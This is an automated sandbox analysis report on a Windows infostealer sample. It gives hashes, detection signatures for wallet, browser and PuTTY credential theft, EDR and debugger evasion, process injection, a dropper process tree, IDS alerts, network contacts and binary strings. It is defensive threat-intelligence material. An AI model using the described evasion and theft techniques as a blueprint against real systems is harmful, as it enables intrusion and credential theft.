Windows Analysis Report
LVkAi4PBv6.exe

Overview

General Information

Sample name: LVkAi4PBv6.exe (renamed because original name is a hash value)
Original sample name: dc1a25a3cecfd804e569a7238ba1ec7f.exe
Analysis ID: 1585283
MD5: dc1a25a3cecfd804e569a7238ba1ec7f
SHA1: 7bf13bcd7957fa71d6e0d70d2a0e0b578c040a62
SHA256: 08e80182805b40159b51722d3993635343dd14b67e262820599031fa9ecd96d0
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • LVkAi4PBv6.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\LVkAi4PBv6.exe" MD5: DC1A25A3CECFD804E569A7238BA1EC7F)
    • LVkAi4PBv6.exe (PID: 968 cmdline: "C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe" -burn.clean.room="C:\Users\user\Desktop\LVkAi4PBv6.exe" -burn.filehandle.attached=528 -burn.filehandle.self=552 MD5: 9C540950F5A8981844FF33BFC55D2F36)
      • AdobeSync.exe (PID: 6388 cmdline: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe MD5: F778E9136AB0DB9DE9802A7043DE50A7)
        • AdobeSync.exe (PID: 6496 cmdline: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe MD5: F778E9136AB0DB9DE9802A7043DE50A7)
          • cmd.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 1532 cmdline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 5580 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 3868 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,10255780505562275753,1680696743736403,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • AdobeSync.exe (PID: 2860 cmdline: "C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe" MD5: F778E9136AB0DB9DE9802A7043DE50A7)
    • cmd.exe (PID: 3084 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 5440 cmdline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 920 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6120 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7160 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7276 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7316 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7128 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7156 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
No yara matches
Source: Process started, Author: frack113, Nasreddine Bencherchali, Data: Command: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2756, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe, ProcessId: 1532, ProcessName: LocalCtrl_alpha_v3.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-07T13:18:55.124619+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49967 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:18:56.443341+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49976 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:18:57.293419+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49977 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:30.283450+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50088 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:31.679881+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50089 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:32.466637+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50090 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:32.706134+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50091 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:33.599585+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50092 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:33.815698+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50093 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:34.654268+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50094 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:34.840859+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50095 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:36.070306+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50096 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:36.332508+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50097 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:37.199026+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50098 | 188.114.97.3 | 443 | TCP |
| 2025-01-07T13:19:37.575118+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 50099 | 188.114.97.3 | 443 | TCP |

AV Detection

Source: https://sn.com, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AXE8SharedExpat.dll, ReversingLabs: Detection: 30%
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AXE8SharedExpat.dll, ReversingLabs: Detection: 30%
Source: LVkAi4PBv6.exe, ReversingLabs: Detection: 23%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe, Code function: 0_2_0087A0BB DecryptFileW,0_2_0087A0BB
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe, Code function: 0_2_0089FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_0089FA62
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe, Code function: 0_2_00879E9E DecryptFileW,DecryptFileW,0_2_00879E9E
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe, Code function: 2_2_005DA0BB DecryptFileW,2_2_005DA0BB
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe, Code function: 2_2_005FFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,2_2_005FFA62
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe, Code function: 2_2_005D9E9E DecryptFileW,DecryptFileW,2_2_005D9E9E
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe, Code function: 3_2_00100070 CryptUnprotectData,_CxxThrowException,3_2_00100070
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe, Code function: 3_2_001000D0 CryptProtectData,_CxxThrowException,3_2_001000D0
Source: LVkAi4PBv6.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe, File opened: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dll
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49967 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50088 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50089 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50092 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50093 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50095 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50097 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50098 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50099 version: TLS 1.2
Source: LVkAi4PBv6.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843250003.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1947218705.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: q\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.in source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: AdobeSync.exe, 00000003.00000002.1393806393.000000000A14C000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394035216.000000000A4A0000.00000004.00000800.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458777606.000000000A457000.00000004.00000001.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458405144.0000000009D49000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458581198.000000000A0A0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685225598.000000000462B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685843617.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2209575820.0000000003CAA000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207504685.000000000226B000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211066150.00000000046A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209762640.0000000003EAF000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209989172.00000000040A2000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211471289.00000000048A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210697474.00000000044A8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2212367556.0000000004AA4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210314239.00000000042A9000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208117967.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: `C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E0D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb717 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AdobeCollabSync.pdb source: AdobeSync.exe, 00000003.00000002.1388149267.000000000013D000.00000002.00000001.01000000.00000008.sdmp, AdobeSync.exe, 00000003.00000000.1362863550.000000000013D000.00000002.00000001.01000000.00000008.sdmp, AdobeSync.exe, 00000003.00000003.1382607094.0000000001307000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000000.1387754147.00000000006DD000.00000002.00000001.01000000.0000000D.sdmp, AdobeSync.exe, 00000004.00000002.1449776370.00000000006DD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini3 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: 3C:\Users\user\AppData\Roaming\Adobe\ols\winload_prod.pdb) source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E0D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: krnlmp.pdbF source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2209575820.0000000003CAA000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207504685.000000000226B000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211066150.00000000046A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209762640.0000000003EAF000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209989172.00000000040A2000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211471289.00000000048A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210697474.00000000044A8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2212367556.0000000004AA4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210314239.00000000042A9000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208117967.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2171269604.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170693552.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2185087878.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208560942.0000000002E1A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2172330186.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2186340967.0000000002E19000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142540338.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: BIB.pdb` source: AdobeSync.exe, 00000003.00000003.1383616075.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394339156.000000006D321000.00000002.00000001.01000000.0000000A.sdmp, AdobeSync.exe, 00000004.00000002.1459521925.000000006D491000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: mbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2171269604.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170693552.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2172330186.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmp
